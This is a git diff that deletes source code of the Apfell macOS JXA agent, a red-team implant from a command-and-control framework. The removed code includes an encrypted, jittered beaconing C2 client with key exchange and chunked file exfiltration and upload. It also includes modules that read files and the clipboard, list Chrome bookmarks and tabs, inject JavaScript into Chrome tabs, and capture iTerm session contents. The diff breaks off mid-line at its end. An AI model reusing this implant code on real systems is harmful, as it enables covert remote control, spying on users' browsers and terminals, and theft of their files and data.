base64 encoded key - if(this.aes_psk !== ""){ - this.parameters = $.CFDictionaryCreateMutable($.kCFAllocatorDefault, 0, $.kCFTypeDictionaryKeyCallBacks, $.kCFTypeDictionaryValueCallBacks); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyType, $.kSecAttrKeyTypeAES); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeySizeInBits, $.kSecAES256); - $.CFDictionarySetValue(this.parameters, $.kSecAttrKeyClass, $.kSecAttrKeyClassSymmetric); - $.CFDictionarySetValue(this.parameters, $.kSecClass, $.kSecClassKey); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - let err = Ref(); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, err); - } - this.using_key_exchange = this.c2_config['key_exchange']; - this.exchanging_keys = this.using_key_exchange; - this.dateFormatter = $.NSDateFormatter.alloc.init; - this.dateFormatter.setDateFormat("yyyy-MM-dd"); - if(this.c2_config['kill_date'] !== undefined && this.c2_config['kill_date'] !== ""){ - this.kill_date = this.dateFormatter.dateFromString(this.c2_config['kill_date']); - }else{ - this.kill_date = $.NSDate.distantFuture; - } - } - get_random_element(x){ - return x[Math.floor(Math.random() * x.length)]; - } - encrypt_message(uid, data){ - // takes in the string we're about to send, encrypts it, and returns a new string - let err = Ref(); - let encrypt = $.SecEncryptTransformCreate(this.cryptokey,err); - let b = $.SecTransformSetAttribute(encrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - b= $.SecTransformSetAttribute(encrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - - //generate a random IV to use - let IV = $.NSMutableData.dataWithLength(16); - $.SecRandomCopyBytes($.kSecRandomDefault, 16, IV.bytes); - b = $.SecTransformSetAttribute(encrypt, $("SecIVKey"), IV, err); - // set our data to be encrypted - let nsdata = $(data).dataUsingEncoding($.NSUTF8StringEncoding); - b=$.SecTransformSetAttribute(encrypt, $.kSecTransformInputAttributeName, nsdata, err); - //$.CFShow(err[0]); - let encryptedData = $.SecTransformExecute(encrypt, err); - // now we need to prepend the IV to the encrypted data before we base64 encode and return it - //generate the hmac - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - let hmac_input = $.NSMutableData.dataWithLength(0); - hmac_input.appendData(IV); - hmac_input.appendData(encryptedData); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, hmac_input, err); - b=$.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - - let final_message = $.NSMutableData.dataWithLength(0); - final_message.appendData( $(uid).dataUsingEncoding($.NSUTF8StringEncoding) ); - final_message.appendData(IV); - final_message.appendData(encryptedData); - final_message.appendData(hmac_data); - return final_message.base64EncodedStringWithOptions(0); - } - decrypt_message(nsdata){ - //takes in a base64 encoded string to be decrypted and returned - //console.log("called decrypt"); - let err = Ref(); - let decrypt = $.SecDecryptTransformCreate(this.cryptokey, err); - $.SecTransformSetAttribute(decrypt, $("SecPaddingKey"), $("SecPaddingPKCS7Key"), err); - $.SecTransformSetAttribute(decrypt, $("SecEncryptionMode"), $("SecModeCBCKey"), err); - //console.log("making ranges"); - //need to extract out the first 16 bytes as the IV and the rest is the message to decrypt - let iv_range = $.NSMakeRange(0, 16); - let message_range = $.NSMakeRange(16, nsdata.length - 48); // 16 for IV 32 for hmac - let hmac_range = $.NSMakeRange(nsdata.length - 32, 32); - let hmac_data_range = $.NSMakeRange(0, nsdata.length - 32); // hmac includes IV + ciphertext - //console.log("carving out iv"); - let iv = nsdata.subdataWithRange(iv_range); - $.SecTransformSetAttribute(decrypt, $("SecIVKey"), iv, err); - let message = nsdata.subdataWithRange(message_range); - $.SecTransformSetAttribute(decrypt, $("INPUT"), message, err); - // create an hmac and verify it matches - let message_hmac = nsdata.subdataWithRange(hmac_range); - let hmac_transform = $.SecDigestTransformCreate($("HMAC-SHA2 Digest Family"), 256, err); - $.SecTransformSetAttribute(hmac_transform, $.kSecTransformInputAttributeName, nsdata.subdataWithRange(hmac_data_range), err); - $.SecTransformSetAttribute(hmac_transform, $.kSecDigestHMACKeyAttribute, $.NSData.alloc.initWithBase64Encoding(this.aes_psk), err); - let hmac_data = $.SecTransformExecute(hmac_transform, err); - if(hmac_data.isEqualToData(message_hmac)){ - let decryptedData = $.SecTransformExecute(decrypt, Ref()); - //console.log("making a string from the message"); - let decrypted_message = $.NSString.alloc.initWithDataEncoding(decryptedData, $.NSUTF8StringEncoding); - //console.log(decrypted_message.js); - return decrypted_message; - } - else{ - return undefined; - } - } - negotiate_key(){ - // Generate a public/private key pair - let parameters = $({"type": $("42"), "bsiz": 4096, "perm": false}); - let err = Ref(); - let privatekey = $.SecKeyCreateRandomKey(parameters, err); - //console.log("generated new key"); - let publickey = $.SecKeyCopyPublicKey(privatekey); - let exported_public = $.SecKeyCopyExternalRepresentation(publickey, err); - //$.CFShow($.CFMakeCollectable(err[0])); - try{ - //this is the catalina case - let b64_exported_public = $.CFMakeCollectable(exported_public); - b64_exported_public = b64_exported_public.base64EncodedStringWithOptions(0).js; // get a base64 encoded string version - exported_public = b64_exported_public; - }catch(error){ - //this is the mojave and high sierra case - exported_public = exported_public.base64EncodedStringWithOptions(0).js; - } - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; - let session_key = Array(20).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - let initial_message = {"session_id": session_key, "pub_key": exported_public, "action": "staging_rsa"}; - // Encrypt our initial message with sessionID and Public key with the initial AES key - while(true){ - try{ - //let req = this.create_message(this.get_random_element(this.post_messages), initial_message, apfell.uuid); - //let stage1 = this.make_request(req); - let stage1 = this.make_request("POST", apfell.uuid, initial_message); - let enc_key = $.NSData.alloc.initWithBase64Encoding(stage1['session_key']); - let dec_key = $.SecKeyCreateDecryptedData(privatekey, $.kSecKeyAlgorithmRSAEncryptionOAEPSHA1, enc_key, err); - // Adjust our global key information with the newly adjusted session key - try{ - this.aes_psk = dec_key.base64EncodedStringWithOptions(0).js; // base64 encoded key - }catch(error){ - let dec_key_collectable = $.CFMakeCollectable(dec_key); - dec_key_collectable = dec_key_collectable.base64EncodedStringWithOptions(0).js; - this.aes_psk = dec_key_collectable; - } - //console.log(JSON.stringify(json_response)); - this.parameters = $({"type": $.kSecAttrKeyTypeAES}); - this.raw_key = $.NSData.alloc.initWithBase64Encoding(this.aes_psk); - this.cryptokey = $.SecKeyCreateFromData(this.parameters, this.raw_key, Ref()); - this.exchanging_keys = false; - return stage1['uuid']; - }catch(error){ - //console.log("error in negotiate_key: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - gen_sleep_time(){ - //generate a time that's this.interval += (this.interval * 1/this.jitter) - let plus_min = Math.round(Math.random()); - if(plus_min === 1){ - return this.interval + (this.interval * (Math.round(Math.random()*this.jitter)/100)); - }else{ - return this.interval - (this.interval * (Math.round(Math.random()*this.jitter)/100)); - } - } - prepend(){ - return arguments[1] + arguments[0]; - } - r_prepend(){ - return arguments[0].slice(String(arguments[1]).length); - } - append(){ - return arguments[0] + arguments[1]; - } - r_append(){ - return arguments[0].slice(0, -1 * String(arguments[1]).length); - } - b64(){ - return base64_encode(String(arguments[0])); - } - r_b64(){ - return base64_decode(String(arguments[0])); - } - random_mixed(){ - let m = [...Array(Number(arguments[1]))].map(i=>(~~(Math.random()*36)).toString(36)).join(''); - return arguments[0] + m; - } - r_random_mixed(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - random_number(){ - let m = [...Array(Number(arguments[1]))].map(i=>(~~(Math.random()*10)).toString(10)).join(''); - return arguments[0] + m; - } - r_random_number(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - random_alpha(){ - let s = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; - let m = Array(Number(arguments[1])).join().split(',').map(function() { return s.charAt(Math.floor(Math.random() * s.length)); }).join(''); - return arguments[0] + m; - } - r_random_alpha(){ - return arguments[0].slice(0, -1 * Number(arguments[1])); - } - choose_random(){ - let choice = Math.floor(Math.random()* arguments[1].length); - if(choice === arguments[1].length){choice -= 1;} - return arguments[0] + arguments[1][choice]; - } - r_choose_random(){ - for(let i = 0; i < arguments[1].length; i++){ - if(arguments[0].includes(arguments[1][i])){ - return arguments[0].replace(arguments[1][i], ""); - } - } - return arguments[0]; - } - get_value(value, transforms){ - let tmp = value; - try { - if (transforms.length > 0) { - for (let i = transforms.length - 1; i >= 0; i--) { - switch (transforms[i]['function']) { - case "base64": - tmp = this.r_b64(tmp); - break; - case "prepend": - tmp = this.r_prepend(tmp, transforms[i]['parameters']); - break; - case "append": - tmp = this.r_append(tmp, transforms[i]['parameters']); - break; - case "random_mixed": - tmp = this.r_random_mixed(tmp, transforms[i]['parameters']); - break; - case "random_number": - tmp = this.r_random_number(tmp, transforms[i]['parameters']); - break; - case "random_alpha": - tmp = this.r_random_alpha(tmp, transforms[i]['parameters']); - break; - case "choose_random": - tmp = this.r_choose_random(tmp, transforms[i]['parameters']); - } - } - } - return tmp; - }catch(error){ - return ""; - } - } - retrieve_message(response, method="POST"){ - let data = this.get_value(($.NSString.alloc.initWithDataEncoding(response, $.NSUTF8StringEncoding)).js, this.c2_config[method]['ServerBody']); - //console.log("in retrieve_message, returning: " + data); - return data; - } - create_value(value, transforms){ - for(let i = 0; i < transforms.length; i++){ - switch(transforms[i]['function']){ - case "base64": - value = this.b64(value); - break; - case "prepend": - value = this.prepend(value, transforms[i]['parameters']); - break; - case "append": - value = this.append(value, transforms[i]['parameters']); - break; - case "random_mixed": - value = this.random_mixed(value, transforms[i]['parameters']); - break; - case "random_number": - value = this.random_number(value, transforms[i]['parameters']); - break; - case "random_alpha": - value = this.random_alpha(value, transforms[i]['parameters']); - break; - case "choose_random": - value = this.choose_random(value, transforms[i]['parameters']); - } - } - return value; - } - create_message(endpoint, data, agent_id=apfell.id, method="POST"){ - if(this.aes_psk !== ""){ - data = this.encrypt_message(agent_id, JSON.stringify(data)).js; - }else if(typeof(sendData) === "string"){ - data = $(uid + sendData).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0); - }else{ - data = $(agent_id + JSON.stringify(data)).dataUsingEncoding($.NSUTF8StringEncoding); - data = data.base64EncodedStringWithOptions(0).js; - } - let base_url = this.get_random_element(endpoint['urls']); - let base_uri = endpoint['uri']; - for(let i in endpoint['urlFunctions']){ - let value = endpoint['urlFunctions'][i]['value']; - if(value === undefined){value = "";} - if(value === "message"){value = data;} - value = this.create_value(value, endpoint['urlFunctions'][i]['transforms']); - base_uri = base_uri.replace(endpoint['urlFunctions'][i]['name'], value); - } - let query_string = "?"; - for(let i in endpoint['QueryParameters']){ - let value = endpoint['QueryParameters'][i]['value']; - if(value === undefined){value = "";} - if(value === "message"){value = data;} - value = this.create_value(value, endpoint['QueryParameters'][i]['transforms']); - let NSCharacterSet = $.NSCharacterSet.characterSetWithCharactersInString("/+=\n").invertedSet; - value = $(value).stringByAddingPercentEncodingWithAllowedCharacters(NSCharacterSet).js; - query_string += endpoint['QueryParameters'][i]['name'] + "=" + value + "&"; - } - base_uri += query_string.slice(0, -1); //take off trailing & or ? - let cookies = {}; - for(let i in endpoint['Cookies']){ - let value = endpoint['Cookies'][i]['value']; - if(value === undefined){ value = "";} - if(value === "message"){ value = data;} - value = this.create_value(value, endpoint['Cookies'][i]['transforms']); - cookies[endpoint['Cookies'][i]['name']] = value; - } - let headers = endpoint['AgentHeaders']; - let cookie_header = ""; - for(let i in cookies){ - cookie_header += i + "=" + cookies[i] + ";"; - } - if(cookie_header !== ""){ - headers['Cookie'] = cookie_header; - } - let url = base_url + base_uri; - let body = this.create_value(data, endpoint['Body']); - // now make the request object - let req = $.NSMutableURLRequest.alloc.initWithURL($.NSURL.URLWithString(url)); - for(let i in headers) { - req.setValueForHTTPHeaderField($.NSString.alloc.initWithUTF8String(headers[i]), $.NSString.alloc.initWithUTF8String(i)); - } - if(method === "POST") { - req.setHTTPMethod($.NSString.alloc.initWithUTF8String("POST")); - let postData = $(body).dataUsingEncodingAllowLossyConversion($.NSString.NSASCIIStringEncoding, true); - let postLength = $.NSString.stringWithFormat("%d", postData.length); - req.addValueForHTTPHeaderField(postLength, $.NSString.alloc.initWithUTF8String('Content-Length')); - req.setHTTPBody(postData); - } - return req; - } - getConfig(){ - //A RESTful base config consists of the following: - // BaseURL (includes Port), CallbackInterval, KillDate (not implemented yet) - let config = { - "C2": { - "commands": this.commands.join(","), - "api_version": this.api_version, - "aes_psk": this.aes_psk, - "config": this.c2_config - }, - "Host": { - "user": apfell.user, - "fullName": apfell.fullName, - "ips": apfell.ip, - "hosts": apfell.host, - "environment": apfell.environment, - "uptime": apfell.uptime, - "args": apfell.args, - "pid": apfell.pid, - "apfell_id": apfell.id, - "payload_id": apfell.uuid - }}; - return JSON.stringify(config, null, 2); - } - checkin(ip, pid, user, host, os, architecture, domain){ - let info = {'ip':ip,'pid':pid,'user':user,'host':host,'uuid':apfell.uuid, "os": os, "architecture": architecture, "domain": domain, "action": "checkin"}; - if(user === 'root'){info['integrity_level'] = 3;} - //let req = null; - let jsondata = null; - if(this.exchanging_keys){ - let sessionID = this.negotiate_key(); - jsondata = this.make_request("POST", sessionID, info); - }else{ - jsondata = this.make_request("POST", apfell.uuid, info); - } - apfell.id = jsondata.id; - // if we fail to get an ID number then exit the application - if(apfell.id === undefined){ $.NSApplication.sharedApplication.terminate(this); } - return jsondata; - } - getTasking(){ - while(true){ - try{ - let task = this.make_request("GET", apfell.id, {"tasking_size":1, "action": "get_tasking"}); - return task['tasks']; - } - catch(error){ - //console.log("error in getTasking: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - postResponse(task, data){ - //depending on the amount of data we're sending, we might need to chunk it - data['task_id'] = task.id; - let postData = {"action": "post_response", "responses": [data]}; - return this.make_request("POST", apfell.id, postData ); - } - make_request(method="POST", uid=apfell.id, data=null){ - while(true){ - try{ - let req; - if(method === "POST"){ - if(this.post_messages.length > 0) { - req = this.create_message(this.get_random_element(this.post_messages), data, uid, method); - }else{ - req = this.create_message(this.get_random_element(this.get_messages), data, uid, method); - } - }else{ - if(this.get_messages.length > 0){ - req = this.create_message(this.get_random_element(this.get_messages), data, uid, method); - }else{ - req = this.create_message(this.get_random_element(this.post_messages), data, uid, method); - } - } - //for some reason it sometimes randomly fails to send the data, throwing a JSON error. loop to fix for now - let response = Ref(); - let error = Ref(); - let responseData = $.NSURLConnection.sendSynchronousRequestReturningResponseError(req,response,error); - responseData = this.retrieve_message(responseData, method); - if( responseData.length < 36){ - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - let resp = $.NSData.alloc.initWithBase64Encoding(responseData); - let uuid_range = $.NSMakeRange(0, 36); - let message_range = $.NSMakeRange(36, resp.length - 36); - let uuid = $.NSString.alloc.initWithDataEncoding(resp.subdataWithRange(uuid_range), $.NSUTF8StringEncoding).js; - //console.log("carving out rest of message"); - if(uuid !== apfell.uuid && uuid !== apfell.id && uuid !== uid){ - //console.log("id doesn't match: " + uuid); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - continue; - } - resp = resp.subdataWithRange(message_range); //could either be plaintext json or encrypted bytes - //we're not doing the initial key exchange - if(this.aes_psk !== ""){ - //if we do need to decrypt the response though, do that - resp = ObjC.unwrap(this.decrypt_message(resp)); - return JSON.parse(resp); - }else{ - //we don't need to decrypt it, so we can just parse and return it - return JSON.parse(ObjC.deepUnwrap($.NSString.alloc.initWithDataEncoding(resp, $.NSUTF8StringEncoding))); - } - } - catch(error){ - //console.log("error in make_request: " + error.toString()); - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); // don't spin out crazy if the connection fails - } - } - } - download(task, params){ - let output = ""; - if( does_file_exist(params)){ - let offset = 0; - let chunkSize = this.chunk_size; //3500; - let full_path = params; - try{ - let fm = $.NSFileManager.defaultManager; - let pieces = ObjC.deepUnwrap(fm.componentsToDisplayForPath(params)); - full_path = "/" + pieces.slice(1).join("/"); - var handle = $.NSFileHandle.fileHandleForReadingAtPath(full_path); - // Get the file size by seeking; - var fileSize = handle.seekToEndOfFile; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), "completed": true}; - } - // always round up to account for chunks that are < chunksize; - let numOfChunks = Math.ceil(fileSize / chunkSize); - let registerData = {'total_chunks': numOfChunks, "full_path": full_path}; - let registerFile = this.postResponse(task, registerData); - if (registerFile['responses'][0]['status'] === "success"){ - handle.seekToFileOffset(0); - let currentChunk = 1; - let data = handle.readDataOfLength(chunkSize); - while(parseInt(data.length) > 0 && offset < fileSize){ - // send a chunk - let fileData = {'chunk_num': currentChunk, 'chunk_data': data.base64EncodedStringWithOptions(0).js, 'file_id': registerFile['responses'][0]['file_id']}; - let response = this.postResponse(task, fileData); - if(response['responses'][0]['status'] === 'success'){ - offset += parseInt(data.length); - handle.seekToFileOffset(offset); - currentChunk += 1; - data = handle.readDataOfLength(chunkSize); - } - $.NSThread.sleepForTimeInterval(this.gen_sleep_time()); - } - output = {"completed":true, "file_id": registerFile['responses'][0]['file_id']}; - } - else{ - output = {'status': 'error', 'user_output': "Failed to register file to download", "completed": true}; - } - } - else{ - output = {'status': 'error', 'user_output': "file does not exist", "completed": true}; - } - return output; - } - upload(task, file_id, full_path){ - try{ - let data = {"action": "upload", "file_id": file_id, "chunk_size": this.chunk_size, "chunk_num": 1, "full_path": full_path, "task_id": task.id}; - let chunk_num = 1; - let total_chunks = 1; - let total_data = $.NSMutableData.dataWithLength(0); - do{ - let file_data = this.make_request("POST", apfell.id, data); - if(file_data['chunk_num'] === 0){ - return {'status': 'error', 'user_output': "Error from the server", "completed": true}; - } - chunk_num = file_data['chunk_num']; - total_chunks = file_data['total_chunks']; - total_data.appendData($.NSData.alloc.initWithBase64Encoding($(file_data['chunk_data']))); - data = {"action": "upload", "file_id": file_id, "chunk_size": this.chunk_size, "chunk_num": chunk_num + 1, "task_id": task.id}; - }while(chunk_num < total_chunks); - return total_data; - }catch(error){ - return {'status': 'error', 'user_output': error.toString(), "completed": true}; - } - } -} -//------------- INSTANTIATE OUR C2 CLASS BELOW HERE IN MAIN CODE----------------------- -ObjC.import('Security'); -C2 = new customC2(); diff --git a/Payload_Types/apfell/agent_code/cat.js b/Payload_Types/apfell/agent_code/cat.js deleted file mode 100755 index 8a352b047..000000000 --- a/Payload_Types/apfell/agent_code/cat.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.cat = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('path')){return {"user_output": "Missing path parameter", "completed": true, "status": "error"}} - let contents = $.NSString.stringWithContentsOfFileEncodingError($(command_params['path']), $.NSUTF8StringEncoding, $()).js; - if(contents === ""){ - return {"user_output": "No output from command", "completed": true}; - } - else if(contents === true){ - return {"user_output": "True", "completed": true}; - } - else if(contents === false){ - return{"user_output": "False", "completed": true}; - } - else if(contents === undefined){ - return {"user_output": "Failed to read file. Either you don't have permissions or the file doesn't exist", "completed": true, "status": "error"}; - } - return {"user_output": contents, "completed": true}; - } - catch(error){ - return {"user_output": error.toString(), "status": "error", "completed": true}; - } -}; diff --git a/Payload_Types/apfell/agent_code/cd.js b/Payload_Types/apfell/agent_code/cd.js deleted file mode 100755 index 64197ba7a..000000000 --- a/Payload_Types/apfell/agent_code/cd.js +++ /dev/null @@ -1,15 +0,0 @@ -exports.cd = function(task, command, params){ - try{ - let command_params = JSON.parse(params); - if(!command_params.hasOwnProperty('path')){return {"user_output": "Missing path parameter", "completed": true, "status": "error"}} - let fileManager = $.NSFileManager.defaultManager; - let success = fileManager.changeCurrentDirectoryPath(command_params['path']); - if(success){ - return {"user_output": "New cwd: " + fileManager.currentDirectoryPath.js, "completed": true}; - }else{ - return {"user_output": "Failed to change directory", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output": error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/chrome_bookmarks.js b/Payload_Types/apfell/agent_code/chrome_bookmarks.js deleted file mode 100755 index e8649b543..000000000 --- a/Payload_Types/apfell/agent_code/chrome_bookmarks.js +++ /dev/null @@ -1,31 +0,0 @@ -exports.chrome_bookmarks = function(task, command, params){ - let all_data = []; - try{ - let ch = Application("Google Chrome"); - if(ch.running()){ - let folders = ch.bookmarkFolders; - for (let i = 0; i < folders.length; i ++){ - let folder = folders[i]; - let bookmarks = folder.bookmarkItems; - all_data.push("Folder Name: " + folder.title()); - for (let j = 0; j < bookmarks.length; j++){ - let info = "Title: " + bookmarks[j].title() + - "\nURL: " + bookmarks[j].url() + - "\nindex: " + bookmarks[j].index() + - "\nFolder/bookmark: " + i + "/" + j; - all_data.push(info); //populate our array - } - } - } - else{ - return {"user_output": "Chrome is not running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": "error"}; - } - return {"user_output": all_data, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/chrome_js.js b/Payload_Types/apfell/agent_code/chrome_js.js deleted file mode 100755 index d63e33c38..000000000 --- a/Payload_Types/apfell/agent_code/chrome_js.js +++ /dev/null @@ -1,23 +0,0 @@ -exports.chrome_js = function(task, command, params){ - try{ - let split_params = JSON.parse(params); - let window = split_params['window']; - let tab = split_params['tab']; - let jscript = split_params['javascript']; - if(Application("Google Chrome").running()){ - let result = Application("Google Chrome").windows[window].tabs[tab].execute({javascript:jscript}); - if(result !== undefined){ - return {"user_output": String(result), "completed": true}; - } - return {"user_output":"completed", "completed": true}; - }else{ - return {"user_output":"Chrome isn't running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/chrome_tabs.js b/Payload_Types/apfell/agent_code/chrome_tabs.js deleted file mode 100755 index 70b0b5208..000000000 --- a/Payload_Types/apfell/agent_code/chrome_tabs.js +++ /dev/null @@ -1,25 +0,0 @@ -exports.chrome_tabs = function(task, command, params){ - let tabs = {}; - try{ - let ch = Application("Google Chrome"); - if(ch.running()){ - for (let i = 0; i < ch.windows.length; i++){ - let win = ch.windows[i]; - tabs["Window " + i] = {}; - for (let j = 0; j < win.tabs.length; j++){ - let tab = win.tabs[j]; - tabs["Window " + i]["Tab " + j] = {"title": tab.title(), "url": tab.url()}; - } - } - }else{ - return {"user_output": "Chrome is not running", "completed": true, "status": "error"}; - } - }catch(error){ - let err = error.toString(); - if(err === "Error: An error occurred."){ - err += " Apfell was denied access to Google Chrome (either by popup or prior deny)."; - } - return {"user_output":err, "completed": true, "status": "error"}; - } - return {"user_output": JSON.stringify(tabs, null, 2), "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/clipboard.js b/Payload_Types/apfell/agent_code/clipboard.js deleted file mode 100755 index 6caf7334d..000000000 --- a/Payload_Types/apfell/agent_code/clipboard.js +++ /dev/null @@ -1,44 +0,0 @@ -exports.clipboard = function(task, command, params){ - ObjC.import('AppKit'); - let parsed_params; - try{ - parsed_params = JSON.parse(params); - }catch(error){ - return {"user_output": "Failed to parse parameters", "status": "error", "completed": true}; - } - if(parsed_params.hasOwnProperty("data") && parsed_params['data'].length > 0){ - // Try setting the clipboard to whatever is in params - try{ - $.NSPasteboard.generalPasteboard.clearContents; - $.NSPasteboard.generalPasteboard.setStringForType($(parsed_params['data']), $.NSPasteboardTypeString); - return {"user_output": "Successfully set the clipboard", "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - } - else{ - //try just reading the clipboard data and returning it - if(parsed_params['types'].length === 0){ - parsed_params['types'].push("public.utf8-plain-text"); - } - try{ - let pb = $.NSPasteboard.generalPasteboard; - let types = pb.types.js; - let clipboard = {}; - for(let i = 0; i < types.length; i++){ - let typejs = types[i].js; - clipboard[typejs] = pb.dataForType(types[i]); - if(clipboard[typejs].js !== undefined && (parsed_params['types'].includes(typejs) || parsed_params['types'][0] == "*")){ - clipboard[typejs] = clipboard[typejs].base64EncodedStringWithOptions(0).js; - }else{ - clipboard[typejs] = ""; - } - } - return {"user_output": JSON.stringify(clipboard, null, 4), "completed": true}; - } - catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } - } -}; diff --git a/Payload_Types/apfell/agent_code/current_user.js b/Payload_Types/apfell/agent_code/current_user.js deleted file mode 100755 index 6980d3c56..000000000 --- a/Payload_Types/apfell/agent_code/current_user.js +++ /dev/null @@ -1,30 +0,0 @@ -exports.current_user = function(task, command, params){ - try{ - let method = "api"; - if(params.length > 0){ - let data = JSON.parse(params); - if(data.hasOwnProperty('method') && data['method'] !== ""){ - method = data['method']; - } - } - if(method === "jxa"){ - let user = Application("System Events").currentUser; - let info = "Name: " + user.name() + - "\nFullName: " + user.fullName() + - "\nhomeDirectory: " + user.homeDirectory() + - "\npicturePath: " + user.picturePath(); - return {"user_output":info, "completed": true}; - } - else if(method === "api"){ - let output = "\nUserName: " + $.NSUserName().js + - "\nFull UserName: " + $.NSFullUserName().js + - "\nHome Directory: " + $.NSHomeDirectory().js; - return {"user_output":output, "completed": true}; - } - else{ - return {"user_output":"Method not supported", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/download.js b/Payload_Types/apfell/agent_code/download.js deleted file mode 100755 index cae93ce6c..000000000 --- a/Payload_Types/apfell/agent_code/download.js +++ /dev/null @@ -1,13 +0,0 @@ -exports.download = function(task, command, params){ - try{ - if(params === "" || params === undefined){return {'user_output': "Must supply a path to a file to download", "completed": true, "status": "error"}; } - let status = C2.download(task, params); - if(status.hasOwnProperty("file_id")){ - status['user_output'] = "Finished Downloading"; - } - return status; - }catch(error){ - return {'user_output': error.toString(), "completed": true, "status": "error"}; - } - -}; diff --git a/Payload_Types/apfell/agent_code/exit.js b/Payload_Types/apfell/agent_code/exit.js deleted file mode 100755 index b3fc84813..000000000 --- a/Payload_Types/apfell/agent_code/exit.js +++ /dev/null @@ -1,6 +0,0 @@ -exports.exit = function(task, command, params){ - ObjC.import("AppKit"); - C2.postResponse(task, {"completed": true, "user_output": "Exiting"}); - $.NSApplication.sharedApplication.terminate($.nil); - $.NSThread.exit(); -}; diff --git a/Payload_Types/apfell/agent_code/get_config.js b/Payload_Types/apfell/agent_code/get_config.js deleted file mode 100755 index 5c6e6dc9f..000000000 --- a/Payload_Types/apfell/agent_code/get_config.js +++ /dev/null @@ -1,4 +0,0 @@ -exports.get_config = function(task, command, params){ - let config = C2.getConfig(); - return {"user_output":config, "completed": true}; -}; diff --git a/Payload_Types/apfell/agent_code/hostname.js b/Payload_Types/apfell/agent_code/hostname.js deleted file mode 100644 index 03b59aafd..000000000 --- a/Payload_Types/apfell/agent_code/hostname.js +++ /dev/null @@ -1,16 +0,0 @@ -exports.hostname = function(task, command, params){ - let output = {}; - output['localized'] = ObjC.deepUnwrap($.NSHost.currentHost.localizedName); - output['names'] = ObjC.deepUnwrap($.NSHost.currentHost.names); - let fileManager = $.NSFileManager.defaultManager; - if(fileManager.fileExistsAtPath("/Library/Preferences/SystemConfiguration/com.apple.smb.server.plist")){ - let dict = $.NSMutableDictionary.alloc.initWithContentsOfFile("/Library/Preferences/SystemConfiguration/com.apple.smb.server.plist"); - let contents = ObjC.deepUnwrap(dict); - output['Local Kerberos Realm'] = contents['LocalKerberosRealm']; - output['NETBIOS Name'] = contents['NetBIOSName']; - output['Server Description'] = contents['ServerDescription']; - } - return {"user_output": JSON.stringify(output, null, 2), "completed": true}; -}; - - \ No newline at end of file diff --git a/Payload_Types/apfell/agent_code/iTerm.js b/Payload_Types/apfell/agent_code/iTerm.js deleted file mode 100755 index a1280510a..000000000 --- a/Payload_Types/apfell/agent_code/iTerm.js +++ /dev/null @@ -1,29 +0,0 @@ -exports.iTerm = function(task, command, params){ - try{ - let term = Application("iTerm"); - if(!term.running()){ - term = Application("iTerm2"); // it might be iTerm2 instead of iTerm in some instances, try both - } - let output = {}; - if(term.running()){ - for(let i = 0; i < term.windows.length; i++){ - let window = {}; - for(let j = 0; j < term.windows[i].tabs.length; j++){ - let tab_info = {}; - tab_info['tty'] = term.windows[i].tabs[j].currentSession.tty(); - tab_info['name'] = term.windows[i].tabs[j].currentSession.name(); - tab_info['contents'] = term.windows[i].tabs[j].currentSession.contents(); - tab_info['profileName'] = term.windows[i].tabs[j].currentSession.profileName(); - window["Tab: " + j] = tab_info; - } - output["Window: " + i] = window; - } - return {"user_output":JSON.stringify(output, null, 2), "completed": true}; - } - else{ - return {"user_output":"iTerm isn't running", "completed": true, "status": "error"}; - } - }catch(error){ - return {"user_output":error.toString(), "completed": true, "status": "error"}; - } -}; diff --git a/Payload_Types/apfell/agent_code/ifconfig.js b/Payload_Types/apfell/agent_code/ifconfig.js deleted file mode 100644 index 2516ed9e4..000000000 --- a/Payload_Types/apfell/agent_code/ifconfig.js +++ /dev/null @@ -1,4 +0,0 @@ -exports.ifconfig = function(task, command, params){ - return {"user_output": JSON.stringify(ObjC.deepUnwrap($.NSHost.currentHost.addresses), null, 2), "completed": true}; -}; - diff --git 